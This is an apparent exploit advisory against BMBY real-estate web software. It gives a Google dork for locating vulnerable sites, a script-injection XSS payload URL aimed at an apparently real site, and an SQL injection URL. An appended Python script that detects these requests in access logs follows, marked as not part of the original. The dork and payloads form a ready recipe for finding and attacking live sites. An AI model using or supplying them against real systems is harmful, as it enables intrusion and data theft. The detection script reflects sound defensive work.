
Israel Real Estate SQLi+XSS

Author: R3NW4, Published: 07-07-2015
# Exploit Title: [Israel Real Estate SQLi+XSS ]
# Google Dork: [מקבוצת BMBY – תוכנות נדל"ן ותיווך powered by]
# Date: [6-7-2015]
# Exploit Author: [R3NW4]
# Platform: (WebApps)
# Version: [All Versions]
# Tested on: [Linux(Debian)]
# Greetz: All Kurdish Hackers - Kurdistan - Peshmarga
-----------------------

XSS:

site.com/english/search.php?search_x=1&house_types_rent=-1&cat_id=6&city=2http://star-gold.co.il/english/search.php?search_x=1&house_types_rent=-1&cat_id=6&city=36'"--></style></script><script>alert(String.fromCharCode(88, 83, 83, 80, 79, 83, 69, 68))</script>

------------------------

SQLi:


site.com/english/search.php?id=&href_from=&save_x=&active_query=&cat_id=6&city=-1&region[]=-1&space_min=1%27&space_max=&rooms_min=-1&rooms_max=-1&price_min=&price_max=&price_unit=USD&search.x=0&search.y=0
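
A detection sketch for the two issues above, added here and not part of the original advisory: it flags access-log requests to search.php whose numeric search parameters (names taken from the URLs above) carry non-numeric data, which covers both the quote in space_min and the markup in city. The log format, the sample lines and the assumption that these parameters are integer-only are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names taken from the advisory's search.php URLs. Treating them as
# integer-only (optionally negative, or empty) is an assumption of this example.
NUMERIC_PARAMS = {"city", "cat_id", "space_min", "space_max", "rooms_min",
                  "rooms_max", "price_min", "price_max", "house_types_rent",
                  "region[]"}
INT_OR_EMPTY = re.compile(r"(?:-?\d+)?")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_params(url):
    """Return sorted names of numeric search.php parameters holding non-numeric data."""
    parts = urlsplit(url)
    if not parts.path.endswith("/search.php"):
        return []
    # parse_qsl percent-decodes names and values, so %27 is seen as a quote.
    bad = {name for name, value in parse_qsl(parts.query, keep_blank_values=True)
           if name in NUMERIC_PARAMS and not INT_OR_EMPTY.fullmatch(value)}
    return sorted(bad)

def scan(log_lines):
    """Yield (line_number, parameter_names) for each log line worth reviewing."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            names = suspicious_params(match.group(1))
            if names:
                yield number, names

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Jul/2015:10:00:01 +0000] "GET /english/search.php?search_x=1&house_types_rent=-1&cat_id=6&city=2 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [07/Jul/2015:10:00:02 +0000] "GET /english/search.php?cat_id=6&city=-1&region[]=-1&space_min=1%27&space_max= HTTP/1.1" 200 812',
    '192.0.2.12 - - [07/Jul/2015:10:00:03 +0000] "GET /english/search.php?cat_id=6&city=36%27%22--%3E%3Cscript%3E HTTP/1.1" 200 5300',
    '192.0.2.13 - - [07/Jul/2015:10:00:04 +0000] "GET /english/index.php?city=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric value in {', '.join(names)}")
```

The same allow-list check, applied server-side before the values reach the query or the page, is the corresponding input-validation control; it complements parameterized queries and output encoding rather than replacing them.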

------------------------

Demo:


------------------------

https://twitter.com/R3NW4
0x3r3nw4@gmail.com
